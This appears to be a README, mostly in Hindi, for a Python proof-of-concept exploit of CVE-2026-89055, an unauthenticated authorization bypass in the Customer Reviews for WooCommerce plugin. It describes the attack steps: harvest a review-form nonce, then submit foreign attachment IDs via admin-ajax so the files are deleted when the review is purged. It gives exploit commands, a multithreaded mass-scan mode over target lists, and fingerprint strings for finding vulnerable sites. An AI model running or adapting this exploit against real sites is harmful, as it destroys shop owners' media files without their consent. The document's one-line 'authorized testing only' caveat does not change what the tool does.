
Python check/exploit PoC CVE-2026-89055 के लिए, जो Customer Reviews for WooCommerce में एक unauthenticated authorization bypass है जिससे हमलावर मनमाने Media Library attachments को deletion के लिए link कर सकते हैं।
Customer Reviews for WooCommerce (customer-reviews-woocommerce / Ivole CusRev) में CVE-2026-89055 के लिए Python 3 PoC।
CVE-2026-89055 — Customer Reviews for WooCommerce (CusRev) ≤ 5.120.0 सार्वजनिक local review form AJAX हैंडलर (cr_local_forms_submit) पर अनुपस्थित प्राधिकरण के प्रति संवेदनशील है। कोई भी व्यक्ति जिसके पास customer review link (/cusrev/{13-hex formId}/ पोस्ट-ऑर्डर ईमेल से) है, एक वैध crSubmitNonce प्राप्त कर सकता है और ऐसी समीक्षाएँ सबमिट कर सकता है जिनकी items[].media सरणी में मनमानी Media Library attachment IDs (उत्पाद छवियाँ, लोगो, PDFs, आदि) हो सकती हैं। वे IDs समीक्षा टिप्पणी मेटा में संग्रहीत होती हैं; जब समीक्षा स्थायी रूप से हटा दी जाती है (ट्रैश पर्ज / स्पैम क्लीनअप), delete_review_media_attachments() प्रत्येक लिंक किए गए ID पर स्वामित्व जाँच के बिना wp_delete_attachment() को कॉल करता है। CVSS 3.1 9.1 Critical (C:N/I:H/A:H)। > 5.120.0 में ठीक किया गया।
समुदाय कैटलॉग: https://pocbit.org/pocs/
{site}/cusrev/{formId}/ खोलें → crSubmitNonce + उत्पाद data-itemid मान पढ़ें।admin-ajax.php पर POST करें: action=cr_local_forms_submit के साथ items[n][media][]=<victim_attachment_id>।ivole_reviews_locl_img / वीडियो) बनाता/अपडेट करता है।delete_review_media_attachments प्रत्येक लिंक किए गए attachment फ़ाइल को हटा देता है।यह PoC अधिकृत लक्ष्यों पर चरण 1–2 करता है। चरण 4 एक साइट/एडमिन जीवनचक्र घटना है (आउटपुट में chain_note के रूप में दस्तावेज़ित करें)।
pip install -r requirements.txt
Python 3.8+।
# Plugin version + optional live form (nonce + item IDs)
python poc.py -u https://shop.example --mode check --form-url /cusrev/abc123def4567/
# Inject foreign attachment ID into first product line item
python poc.py -u https://shop.example --mode exploit \
--form-id abc123def4567 --attachment-id 123 \
--verify-url https://shop.example/wp-content/uploads/2026/01/product.jpg
# Mass: base URL per line, optional form path after |
python poc.py --list targets.example.txt --mode check -j 20 --quiet
| File | Meaning |
|---|---|
cve_2026_89055_results.jsonl | प्रति-लक्ष्य JSON |
hits.txt | उम्मीदवार या exploit मार्कर |
candidates.jsonl | फ़ॉर्म लिंक की आवश्यकता वाले Plugin-vuln होस्ट |
body="/wp-content/plugins/customer-reviews-woocommerce/"
body="/cusrev/"
केवल अधिकृत परीक्षण।
| Platform | WordPress + WooCommerce |
| Plugin | Customer Reviews for WooCommerce |
| Affected | ≤ 5.120.0 |
| CWE | CWE-862 (Missing Authorization) |
| Prerequisite | सार्वजनिक /cusrev/{formId}/ लिंक (पृष्ठ पर nonce) |
| Impact | समीक्षा पर्ज के बाद मनमानी मीडिया विलोपन (अखंडता + उपलब्धता) |